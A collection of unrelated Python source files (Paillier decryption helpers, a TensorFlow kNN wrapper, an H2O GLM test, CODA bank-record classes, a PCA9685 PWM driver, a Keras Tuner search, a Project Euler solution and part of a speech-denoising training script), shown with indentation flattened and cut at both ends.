decrypt_x = []
for i in range(X.shape[0]):
elem = private_key.decrypt(X[i])
decrypt_x.append(elem)
return np.array(decrypt_x, dtype=np.float64)
def decrypt_matrix(private_key: PaillierPrivateKey, A):
"""
decrypt matrix with dim 1, 2 or 3
:param private_key:
:param A:
:return:
"""
if len(A.shape) == 1:
A = np.expand_dims(A, axis=0)
decrypt_A = []
for i in range(len(A)):
row = []
for j in range(len(A[i])):
if len(A.shape) == 3:
row.append([private_key.decrypt(A[i, j, k]) for k in range(len(A[i][j]))])
else:
row.append(private_key.decrypt(A[i, j]))
decrypt_A.append(row)
result = np.array(decrypt_A, dtype=np.float64)
if len(A.shape) == 1:
result = np.squeeze(result, axis=0)
return result
|
import abc
class ValidationRule(abc.ABC):
message: dict = None
@abc.abstractmethod
def is_valid(self) -> bool:
raise NotImplementedError("Not Implemented Yet")
|
import tensorflow as tf
from tensorflow.python.framework import ops
'''
Wrap the module
'''
_nknn_op = tf.load_op_library('slicing_knn.so')
def check_tuple(in_tuple, tuple_name: str, tuple_type: type):
if in_tuple is None:
raise ValueError("<", tuple_name, "> argument is not specified!")
if len(in_tuple)!=2:
raise ValueError("<", tuple_name, "> argument has to be tuple of size 2!")
if (type(in_tuple[0]) is not tuple_type) or (type(in_tuple[1]) is not tuple_type):
raise ValueError("<", tuple_name, "> argument has to be of type Tuple[",tuple_type,",",tuple_type,"]!")
if (in_tuple[0]<0) or (in_tuple[1]<0):
raise ValueError("<", tuple_name, "> tuple has to contain only positive values!")
def SlicingKnn(K : int, coords, row_splits, features_to_bin_on=None, n_bins=None, bin_width=None):
'''
Perform kNN search with slicing method
@type K: int
@param K: number of neighbours to search for
@type coords: tf.Tensor
@param coords: coordinate tensor
@type row_splits: tf.Tensor
@param row_splits: row splits tensor
@type features_to_bin_on: Tuple[int, int]
@param features_to_bin_on: indices of features to bin on
@type n_bins: Tuple[int, int]
@param n_bins: number of bins to split phase space for kNN search
@type bin_width: Tuple[float, float]
@param bin_width: width of phase-space bins
'''
# type and values check for input parameters
check_tuple(features_to_bin_on,"features_to_bin_on",int)
n_features = coords.shape[1]
if (features_to_bin_on[0]>=n_features) or (features_to_bin_on[1]>=n_features) or (features_to_bin_on[0]==features_to_bin_on[1]):
raise ValueError("Value error for <features_to_bin_on>!")
if ((n_bins is None) and (bin_width is None)) or ((n_bins is not None) and (bin_width is not None)):
raise ValueError("Specify either <n_bins> OR <bin_width> argument but not both!")
if n_bins is None:
check_tuple(bin_width,"bin_width",float)
else:
check_tuple(n_bins,"n_bins",int)
# features to do 2d phase-space binning on
bin_f1 = features_to_bin_on[0]
bin_f2 = features_to_bin_on[1]
# find min/max in tensor taking into account row_splits
# TODO is creation of ragged tensor an expensive operation (memory and time wise)?
coords_ragged = tf.RaggedTensor.from_row_splits(values=coords, row_splits=row_splits)
r_max = tf.map_fn(tf.math.argmax, coords_ragged, fn_output_signature=tf.int64)
r_min = tf.map_fn(tf.math.argmin, coords_ragged, fn_output_signature=tf.int64)
# contains minimum and maximum coordinates of two first dimentions in coords tensor
_phase_space_bin_boundary = []
if n_bins is None:
n_bins = [float('inf'),float('inf')]
for i_split in range(0,len(row_splits)-1):
min_coords = r_min[i_split]
max_coords = r_max[i_split]
_min = coords[min_coords[bin_f1]+row_splits[i_split].numpy()][bin_f1].numpy()
_max = coords[max_coords[bin_f1]+row_splits[i_split].numpy()][bin_f1].numpy()
_phase_space_bin_boundary.append((_min-0.00001*(_max-_min)).item())
_phase_space_bin_boundary.append((_max+0.00001*(_max-_min)).item())
_min = coords[min_coords[bin_f2]+row_splits[i_split].numpy()][bin_f2].numpy()
_max = coords[max_coords[bin_f2]+row_splits[i_split].numpy()][bin_f2].numpy()
_phase_space_bin_boundary.append((_min-0.00001*(_max-_min)).item())
_phase_space_bin_boundary.append((_max+0.00001*(_max-_min)).item())
# find n_bins for the current batch
if bin_width is not None:
n_bins_1 = int((_phase_space_bin_boundary[-3] - _phase_space_bin_boundary[-4]) / bin_width[0]) + 1
n_bins_2 = int((_phase_space_bin_boundary[-1] - _phase_space_bin_boundary[-2]) / bin_width[1]) + 1
if n_bins_1<n_bins[0]:
n_bins[0] = n_bins_1
if n_bins_2<n_bins[1]:
n_bins[1] = n_bins_2
if type(n_bins) is list:
n_bins = tuple(n_bins)
return _nknn_op.SlicingKnn(n_neighbours=K, coords=coords, row_splits=row_splits, n_bins=n_bins, features_to_bin_on=features_to_bin_on, phase_space_bin_boundary=_phase_space_bin_boundary)
_sknn_grad_op = tf.load_op_library('select_knn_grad.so')
@ops.RegisterGradient("SlicingKnn")
def _SelectKnnGrad(op, gradidx, dstgrad):
coords = op.inputs[0]
indices = op.outputs[0]
distances = op.outputs[1]
coord_grad = _sknn_grad_op.SelectKnnGrad(grad_distances=dstgrad, indices=indices, distances=distances, coordinates=coords)
# return coord_grad, None, None #no grad for row splits and masking values
return coord_grad
|
import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o2 as h2o
import h2o_cmd, h2o_import as h2i, h2o_jobs, h2o_glm
from h2o_test import verboseprint, dump_json, OutputObj
def write_syn_dataset(csvPathname, rowCount, colCount, SEED):
r1 = random.Random(SEED)
dsf = open(csvPathname, "w+")
for i in range(rowCount):
rowData = []
for j in range(colCount):
ri = r1.randint(0,1)
rowData.append(ri)
ri = r1.randint(0,1)
rowData.append(ri)
rowDataCsv = ",".join(map(str,rowData))
dsf.write(rowDataCsv + "\n")
dsf.close()
class Basic(unittest.TestCase):
def tearDown(self):
h2o.nodes[0].log_download()
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1,java_heap_GB=13)
@classmethod
def tearDownClass(cls):
### time.sleep(3600)
h2o.tear_down_cloud()
def test_GLM_many_cols(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
# (2, 100, 'cA', 300),
# (4, 200, 'cA', 300),
(10000, 1000, 'cB', 300),
(10000, 3000, 'cC', 500),
]
### h2b.browseTheCloud()
lenNodes = len(h2o.nodes)
for (rowCount, colCount, hex_key, timeoutSecs) in tryList:
SEEDPERFILE = random.randint(0, sys.maxint)
# csvFilename = 'syn_' + str(SEEDPERFILE) + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvFilename = 'syn_' + "binary" + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "Creating random", csvPathname
write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE)
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key, timeoutSecs=180, doSummary=False)
pA = h2o_cmd.ParseObj(parseResult)
iA = h2o_cmd.InspectObj(pA.parse_key)
parse_key = pA.parse_key
numRows = iA.numRows
numCols = iA.numCols
labelList = iA.labelList
expected = []
allowedDelta = 0
labelListUsed = list(labelList)
response = 'C' + str(len(labelListUsed)-1) # last column
labelListUsed.remove(response)
numColsUsed = numCols - 1
for trial in range(1):
# family [u'gaussian', u'binomial', u'poisson', u'gamma', u'tweedie']
# link [u'family_default', u'identity', u'logit', u'log', u'inverse', u'tweedie']
# can we do classification with probabilities?
# are only lambda and alpha grid searchable?
parameters = {
'validation_frame': parse_key,
'ignored_columns': None,
# FIX! for now just use a column that's binomial
'response_column': response, # can't take index now?
# FIX! when is this needed? redundant for binomial?
'balance_classes': False,
'max_after_balance_size': None,
'standardize': False,
'family': 'binomial',
'link': None,
'alpha': '[1e-4]',
'lambda': '[0.5,0.25, 0.1]',
'prior1': None,
'lambda_search': None,
'nlambdas': None,
'lambda_min_ratio': None,
# 'use_all_factor_levels': False,
}
model_key = 'many_cols_glm.hex'
bmResult = h2o.n0.build_model(
algo='glm',
model_id=model_key,
training_frame=parse_key,
parameters=parameters,
timeoutSecs=300)
bm = OutputObj(bmResult, 'bm')
modelResult = h2o.n0.models(key=model_key)
model = OutputObj(modelResult['models'][0]['output'], 'model')
h2o_glm.simpleCheckGLM(self, model, parameters, labelList, labelListUsed)
cmmResult = h2o.n0.compute_model_metrics(model=model_key, frame=parse_key, timeoutSecs=60)
cmm = OutputObj(cmmResult, 'cmm')
mmResult = h2o.n0.model_metrics(model=model_key, frame=parse_key, timeoutSecs=60)
mm = OutputObj(mmResult, 'mm')
prResult = h2o.n0.predict(model=model_key, frame=parse_key, timeoutSecs=60)
pr = OutputObj(prResult['model_metrics'][0]['predictions'], 'pr')
if __name__ == '__main__':
h2o.unit_main()
|
import re
from pycoda.fields import (
BalanceField,
BooleanField,
DateField,
EmptyField,
NumericField,
StringField,
ZeroesField,
)
class RecordIdentification(object):
INITIAL = 0
OLD_BALANCE = 1
TRANSACTION = 2
INFORMATION = 3
EXTRA_MESSAGE = 4
NEW_BALANCE = 8
FINAL = 9
class RecordArticle(object):
DEFAULT = 1
PURPOSE = 2
DETAIL = 3
class Record(object):
IDENTIFICATION = None
ARTICLE = None
def __init__(self):
self._fields = ()
def __getattr__(self, item):
"""By implementing this, all the fields their values are accessible"""
field_name = "_{item}_field".format(item=item)
if field_name not in self.__dict__.keys():
raise AttributeError("Unknown value")
return self.__dict__[field_name].value
def __setattr__(self, key, value):
"""By implementing this, all the fields their values are accessible"""
field_name = "_{key}_field".format(key=key)
if field_name in self.__dict__.keys():
self.__dict__[field_name].value = value
else:
super(Record, self).__setattr__(key, value)
def dumps(self):
return "".join(field.dumps() for field in self._fields)
def loads(self, string):
for field in self._fields:
field.loads(string[field.position : field.position + field.length])
def field_dict(self):
"""Dict-like representation of all field values"""
regex = re.compile(r"^_(?P<name>((\w+)(_)?)+)_field")
dictionary = {}
for key, field in self.__dict__.items():
if field in self._fields:
match = regex.match(key)
if match is not None:
dictionary[match.group("name")] = field.value
return dictionary
class InitialRecord(Record):
IDENTIFICATION = RecordIdentification.INITIAL
ARTICLE = None
APPLICATION_CODE = "05"
VERSION_CODE = 2
def __init__(
self,
creation_date=None,
bank_identification_number=None,
is_duplicate=None,
reference=None,
addressee=None,
bic=None,
account_holder_reference=None,
free=None,
transaction_reference=None,
related_reference=None,
):
super(Record, self).__init__()
self._identification_field = NumericField(
0, 1, value=InitialRecord.IDENTIFICATION
)
self._zeroes_field = ZeroesField(1, 4)
self._creation_date_field = DateField(5, 6, value=creation_date)
self._bank_identification_number_field = NumericField(
11, 3, value=bank_identification_number
)
self._application_code_field = StringField(
14, 2, value=InitialRecord.APPLICATION_CODE
)
self._duplicate_field = BooleanField(
16, 1, value=is_duplicate, true_value="D", false_value=" "
)
self._empty_field0 = EmptyField(17, 7)
self._reference_field = StringField(24, 10, value=reference)
self._addressee_field = StringField(34, 26, value=addressee)
self._bic_field = StringField(60, 11, value=bic)
self._account_holder_reference_field = NumericField(
71, 11, value=account_holder_reference, head="0"
)
self._empty_field1 = EmptyField(82, 1)
self._free_field = StringField(83, 5, value=free)
self._transaction_reference_field = StringField(
88, 16, value=transaction_reference, tag="20/1"
)
self._related_reference_field = StringField(
104, 16, value=related_reference, tag="21/1"
)
self._empty_field2 = EmptyField(120, 7)
self._version_code_field = NumericField(
127, 1, value=InitialRecord.VERSION_CODE
)
self._fields = (
self._identification_field,
self._zeroes_field,
self._creation_date_field,
self._bank_identification_number_field,
self._application_code_field,
self._duplicate_field,
self._empty_field0,
self._reference_field,
self._addressee_field,
self._bic_field,
self._account_holder_reference_field,
self._empty_field1,
self._free_field,
self._transaction_reference_field,
self._related_reference_field,
self._empty_field2,
self._version_code_field,
)
class OldBalanceRecord(Record):
IDENTIFICATION = RecordIdentification.OLD_BALANCE
ARTICLE = None
def __init__(
self,
account_structure=None,
serial_number=None,
account_number=None,
balance_sign=None,
old_balance=None,
balance_date=None,
account_holder_name=None,
account_description=None,
bank_statement_serial_number=None,
):
super(OldBalanceRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=OldBalanceRecord.IDENTIFICATION
)
self._account_structure_field = NumericField(1, 1, value=account_structure)
self._serial_number_field = NumericField(2, 3, value=serial_number, tag="28c/1")
self._account_number_field = StringField(5, 37, value=account_number)
self._balance_sign_field = NumericField(42, 1, value=balance_sign, tag="60F/1")
self._old_balance_field = BalanceField(43, value=old_balance, tag="60F/4")
self._balance_date_field = DateField(58, 6, value=balance_date, tag="60F/2")
self._account_holder_name_field = StringField(64, 26, value=account_holder_name)
self._account_description_field = StringField(90, 35, value=account_description)
self._bank_statement_serial_number_field = NumericField(
125, 3, value=bank_statement_serial_number
)
self._fields = (
self._identification_field,
self._account_structure_field,
self._serial_number_field,
self._account_number_field,
self._balance_sign_field,
self._old_balance_field,
self._balance_date_field,
self._account_holder_name_field,
self._account_description_field,
self._bank_statement_serial_number_field,
)
class TransactionRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.DEFAULT
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
balance_sign=None,
balance=None,
balance_date=None,
transaction_code=None,
reference_type=None,
reference=None,
booking_date=None,
bank_statement_serial_number=None,
globalisation_code=None,
transaction_sequence=None,
information_sequence=None,
):
super(TransactionRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 21, value=bank_reference_number, tag="61/8"
)
self._balance_sign_field = NumericField(31, 1, value=balance_sign, tag="61/3")
self._balance_field = BalanceField(32, value=balance, tag="61/5")
self._balance_date_field = DateField(47, 6, value=balance_date, tag="61/1")
self._transaction_code_field = NumericField(
53, 8, value=transaction_code, tag="61/6"
)
self._reference_type_field = NumericField(61, 1, value=reference_type)
self._reference_field = StringField(62, 53, value=reference, tag="61/9")
self._booking_date_field = DateField(115, 6, value=booking_date, tag="61/2")
self._bank_statement_serial_number_field = NumericField(
121, 3, value=bank_statement_serial_number, tag="28/c"
)
self._globalisation_code_field = NumericField(124, 1, value=globalisation_code)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._balance_sign_field,
self._balance_field,
self._balance_date_field,
self._transaction_code_field,
self._reference_type_field,
self._reference_field,
self._booking_date_field,
self._bank_statement_serial_number_field,
self._globalisation_code_field,
self._transaction_sequence_field,
self._empty_field,
self._information_sequence_field,
)
class TransactionPurposeRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.PURPOSE
def __init__(
self,
serial_number=None,
detail_number=None,
bank_statement=None,
client_reference=None,
bic=None,
purpose_category=None,
purpose=None,
transaction_sequence=None,
information_sequence=None,
):
super(Record, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionPurposeRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_statement_field = StringField(10, 53, value=bank_statement)
self._client_reference_field = StringField(63, 35, value=client_reference)
self._bic_field = StringField(98, 11, value=bic)
self._empty_field0 = EmptyField(109, 8)
self._purpose_category_field = StringField(117, 4, value=purpose_category)
self._purpose_field = StringField(121, 4, value=purpose)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_statement_field,
self._client_reference_field,
self._bic_field,
self._empty_field0,
self._purpose_category_field,
self._purpose_field,
self._transaction_sequence_field,
self._empty_field1,
self._information_sequence_field,
)
class TransactionDetailRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.DETAIL
def __init__(
self,
serial_number=None,
detail_number=None,
account_number=None,
account_holder_name=None,
description=None,
information_sequence=None,
):
super(TransactionDetailRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionDetailRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionDetailRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._account_number_field = StringField(10, 37, value=account_number)
self._account_holder_name_field = StringField(47, 35, value=account_holder_name)
self._description_field = StringField(82, 43, value=description)
self._sequence_code_field = ZeroesField(125, 1)
self._empty_field = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._account_number_field,
self._account_holder_name_field,
self._description_field,
self._sequence_code_field,
self._empty_field,
self._information_sequence_field,
)
class InformationRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.DEFAULT
def __init__(
self,
serial_number=None,
detail_number=None,
reference_number=None,
transaction_code=None,
reference_type=None,
reference=None,
transaction_sequence=None,
information_sequence=None,
):
super(InformationRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._reference_number_field = StringField(
10, 21, value=reference_number, tag="61/8"
)
self._transaction_code_field = NumericField(
31, 8, value=transaction_code, tag="61/6"
)
self._reference_type_field = NumericField(39, 1, value=reference_type)
self._reference_field = StringField(40, 73, value=reference, tag="86")
self._empty_field0 = EmptyField(113, 12)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._reference_number_field,
self._transaction_code_field,
self._reference_type_field,
self._reference_field,
self._empty_field0,
self._transaction_sequence_field,
self._empty_field1,
self._information_sequence_field,
)
class InformationPurposeRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.PURPOSE
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
information_sequence0=None,
information_sequence1=None,
):
super(InformationPurposeRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationPurposeRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 105, value=bank_reference_number
)
self._empty_field0 = EmptyField(115, 10)
self._information_sequence_field0 = BooleanField(
125, 1, value=information_sequence0, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field1 = BooleanField(
127, 1, value=information_sequence1, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._empty_field0,
self._information_sequence_field0,
self._empty_field1,
self._information_sequence_field1,
)
class InformationDetailRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.DETAIL
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
information_sequence=None,
):
super(InformationDetailRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationPurposeRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 90, value=bank_reference_number
)
self._empty_field0 = EmptyField(100, 25)
self._sequence_code_field = ZeroesField(125, 1)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._empty_field0,
self._sequence_code_field,
self._empty_field1,
self._information_sequence_field,
)
class NewBalanceRecord(Record):
IDENTIFICATION = RecordIdentification.NEW_BALANCE
ARTICLE = None
def __init__(
self,
serial_number=None,
account_number=None,
balance_sign=None,
new_balance=None,
balance_date=None,
sequence=None,
):
super(NewBalanceRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=NewBalanceRecord.IDENTIFICATION
)
self._serial_number_field = NumericField(1, 3, value=serial_number, tag="28c/1")
self._account_number_field = StringField(4, 37, value=account_number)
self._balance_sign_field = NumericField(41, 1, value=balance_sign, tag="62F/1")
self._new_balance_field = BalanceField(42, value=new_balance, tag="62F/4")
self._balance_date_field = DateField(57, 6, value=balance_date, tag="62F/2")
self._empty_field = EmptyField(63, 64)
self._sequence_field = BooleanField(
127, 1, value=sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._serial_number_field,
self._account_number_field,
self._balance_sign_field,
self._new_balance_field,
self._balance_date_field,
self._empty_field,
self._sequence_field,
)
class ExtraMessageRecord(Record):
IDENTIFICATION = RecordIdentification.EXTRA_MESSAGE
ARTICLE = None
def __init__(
self,
serial_number=None,
detail_number=None,
extra_message=None,
has_sequence=None,
):
super(ExtraMessageRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=ExtraMessageRecord.IDENTIFICATION
)
self._empty_field0 = EmptyField(1, 1)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._empty_field1 = EmptyField(10, 22)
self._extra_message_field = StringField(32, 80, value=extra_message)
self._empty_field2 = EmptyField(112, 15)
self._sequence_field = BooleanField(
127, 1, value=has_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._empty_field0,
self._serial_number_field,
self._detail_number_field,
self._empty_field1,
self._extra_message_field,
self._empty_field2,
self._sequence_field,
)
class FinalRecord(Record):
IDENTIFICATION = RecordIdentification.FINAL
ARTICLE = None
def __init__(self, number_records=None, debit=None, credit=None, has_sequence=None):
super(FinalRecord, self).__init__()
self._identification_field = NumericField(0, 1, FinalRecord.IDENTIFICATION)
self._empty_field0 = EmptyField(1, 15)
self._number_records_field = NumericField(16, 6, value=number_records)
self._debit_field = BalanceField(22, value=debit)
self._credit_field = BalanceField(37, value=credit)
self._empty_field1 = EmptyField(52, 75)
self._sequence_field = BooleanField(
127, 1, value=has_sequence, true_value="1", false_value="2"
)
self._fields = (
self._identification_field,
self._empty_field0,
self._number_records_field,
self._debit_field,
self._credit_field,
self._empty_field1,
self._sequence_field,
)
|
"""
This module provides classes for interfacing with a PCA9685 PWM extension.
"""
import time
from myDevices.devices.i2c import I2C
from myDevices.devices.analog import PWM
from myDevices.plugins.analog import AnalogOutput
class PCA9685(PWM, I2C):
"""Base class for interacting with a PCA9685 extension."""
MODE1 = 0x00
PWM_BASE = 0x06
PRESCALE = 0xFE
M1_SLEEP = 1<<4
M1_AI = 1<<5
M1_RESTART = 1<<7
def __init__(self, slave=0x40, frequency=50):
"""Initializes PCA9685 device.
Arguments:
slave: The slave address
frequency: The PWM control frequency
"""
I2C.__init__(self, int(slave))
PWM.__init__(self, 16, 12, int(frequency))
self.VREF = 0
self.prescale = int(25000000.0/((2**12)*self.frequency))
self.mode1 = self.M1_RESTART | self.M1_AI
self.writeRegister(self.MODE1, self.M1_SLEEP)
self.writeRegister(self.PRESCALE, self.prescale)
time.sleep(0.01)
self.writeRegister(self.MODE1, self.mode1)
def __str__(self):
"""Returns friendly name."""
return "PCA9685(slave=0x%02X)" % self.slave
def __pwmRead__(self, channel):
"""Returns the value for the specified channel. Overrides PWM.__pwmRead__."""
addr = self.getChannelAddress(channel)
d = self.readRegisters(addr, 4)
start = d[1] << 8 | d[0]
end = d[3] << 8 | d[2]
return end-start
def __pwmWrite__(self, channel, value):
"""Writes the value to the specified channel. Overrides PWM.__pwmWrite__."""
addr = self.getChannelAddress(channel)
d = bytearray(4)
d[0] = 0
d[1] = 0
d[2] = (value & 0x0FF)
d[3] = (value & 0xF00) >> 8
self.writeRegisters(addr, d)
def getChannelAddress(self, channel):
"""Returns the address for the specified channel."""
return int(channel * 4 + self.PWM_BASE)
class PCA9685Test(PCA9685):
"""Class for simulating a PCA9685 device."""
def __init__(self):
"""Initializes the test class."""
self.registers = {}
PCA9685.__init__(self)
def readRegister(self, addr):
"""Read value from a register."""
if addr not in self.registers:
self.registers[addr] = 0
return self.registers[addr]
def readRegisters(self, addr, size):
"""Read value from a register."""
if addr not in self.registers:
self.registers[addr] = bytearray(size)
return self.registers[addr]
def writeRegister(self, addr, value):
"""Write value to a register."""
self.registers[addr] = value
def writeRegisters(self, addr, value):
"""Write value to a register."""
self.registers[addr] = value
|
import os
import pathlib
import numpy as np
import keras_tuner as kt
from sklearn.preprocessing import OneHotEncoder
from sklearn import ensemble
from sklearn import metrics
from sklearn import model_selection
from sklearn import pipeline
from sklearn.metrics import accuracy_score
PATH = pathlib.Path(__file__).resolve().parent / "2_final data"
features = np.load(os.path.join(PATH, "train_val_features.npy"))
labels = np.load(os.path.join(PATH, "train_val_labels.npy"))
test_features = np.load(os.path.join(PATH, "test_features.npy"))
test_labels = np.load(os.path.join(PATH, "test_labels.npy"))
# One hot encode labels
labels = OneHotEncoder().fit_transform(X=labels.reshape(-1, 1)).toarray()
test_labels = OneHotEncoder().fit_transform(X=test_labels.reshape(-1, 1)).toarray()
# Define the model: Random Forest
class RF(kt.HyperModel):
def build(self, hp):
model = ensemble.RandomForestClassifier(
n_estimators=hp.Int("n_estimators", 30, 80, step=10),
max_depth=hp.Int("max_depth", 3, 10),
)
return model
hypermodel = RF()
# Find optimal hyperparameters
tuner = kt.tuners.SklearnTuner(
oracle=kt.oracles.BayesianOptimizationOracle(
# Keras docs: "Note that for this Tuner, the objective for the Oracle should always be set to Objective('score', direction='max')"
objective=kt.Objective("score", "max"),
max_trials=20,
),
hypermodel=hypermodel,
scoring=metrics.make_scorer(metrics.accuracy_score),
# Would be more appropiate to prune the sets based on label overlap, and possibly also to do the kind of CV described in "Advances in Financial ML"
# but for now using .TimeSeriesSplit() with the gap parameter does the job
cv=model_selection.TimeSeriesSplit(5, gap=100),
project_name="Keras_tuner_metadata/RF",
overwrite=True,
)
tuner.search(features, labels)
# Show the results
tuner.results_summary(num_trials=3)
# Build the model with the optimal hyperparameters
best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]
best_model = tuner.hypermodel.build(best_hps)
# # Do the final test on the test set
# best_model.fit(features, labels)
# predictions = best_model.predict(test_features)
# print('\n','Score on the test set: ',accuracy_score(test_labels, predictions))
|
'''
It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.
'''
from functions import *
def allSameDigits(two, three, four, five, six):
'''Pre: the 5 arguments are all strings that have the same length.
Post: returns true if all the strings have the same digits.'''
#sort all of them
#TODO it might be more efficient to sort only two at a time and compare them before moving on to the next pair, but I don't care enough about a few milliseconds to make this change.
two = sorted(two)
three = sorted(three)
four = sorted(four)
five = sorted(five)
six = sorted(six)
#compare value at each index
for i in range(len(two)):
if two[i] != three[i] or three[i] != four[i] or \
four[i] != five[i] or five[i] != six[i]:
return False
return True
def solveEuler052(dummy):
x=1
while True:
#See if 2*x and 6*x have the same number of digits, otherwise we can safely move on
two=2*x
six=str(3*two)
two=str(two)
if len(two) == len(six):
three=str(3*x)
four=str(4*x) #TODO More efficient to store two as a number and multiply it by 2 here? For example: four=str(2*two)
five=str(5*x)
if allSameDigits(two, three, four, five, six):
print two, three, four, five, six
print x
return x
x += 1
timeFunction(solveEuler052, None)
|
#!/usr/bin/env python
# Copyright (c) 2009-2013 Simon van Heeringen <s.vanheeringen@ncmls.ru.nl>
#
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
import sys
import os
from gimmemotifs.genome_index import GenomeIndex
def index(args):
if not os.path.exists(args.indexdir):
print "Index_dir %s does not exist!" % (args.indexdir)
sys.exit(1)
fasta_dir = args.fastadir
index_dir = os.path.join(args.indexdir, args.indexname)
g = GenomeIndex()
g = g.create_index(fasta_dir, index_dir)
|
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
from sklearn.model_selection import train_test_split
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from model_unet import unet
from data_tools import scaled_in, scaled_ou
def training(path_save_spectrogram, weights_path, name_model, training_from_scratch, epochs, batch_size):
""" This function will read noisy voice and clean voice spectrograms created by data_creation mode,
and train a Unet model on this dataset for epochs and batch_size specified. It saves best models to disk regularly
If training_from_scratch is set to True it will train from scratch, if set to False, it will train
from weights (name_model) provided in weights_path
"""
#load noisy voice & clean voice spectrograms created by data_creation mode
X_in = np.load(path_save_spectrogram +'noisy_voice_amp_db'+".npy")
X_ou = np.load(path_save_spectrogram +'voice_amp_db'+".npy")
#Model of noise to predict
X_ou = X_in - X_ou
#Check distribution
print(stats.describe(X_in.reshape(-1,1)))
print(stats.describe(X_ou.reshape(-1,1)))
#to scale between -1 and 1
X_in = scaled_in(X_in)
X_ou = scaled_ou(X_ou)
#Check shape of spectrograms
print(X_in.shape)
print(X_ou.shape)
#Check new distribution
print(stats.describe(X_in.reshape(-1,1)))
print(stats.describe(X_ou.reshape(-1,1)))
#Reshape for training
